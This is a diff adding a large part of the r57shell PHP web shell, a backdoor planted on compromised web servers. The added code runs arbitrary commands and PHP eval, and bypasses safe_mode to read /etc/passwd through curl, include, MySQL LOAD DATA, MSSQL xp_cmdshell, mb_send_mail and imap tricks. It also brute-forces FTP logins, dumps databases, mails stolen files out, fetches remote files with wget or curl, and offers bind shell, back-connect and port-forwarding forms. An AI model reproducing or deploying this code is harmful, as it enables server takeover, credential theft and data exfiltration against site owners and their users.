+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+     @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_r57_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }	
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");	
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);	
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);	
+  break;
+  case 'test8':
+  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+  else echo $lang[$language.'_text119'];
+  break;	
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {	
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);	
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } 
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];	
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } 
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ } 
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ { 
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; 	
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';	
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&$unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&$unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
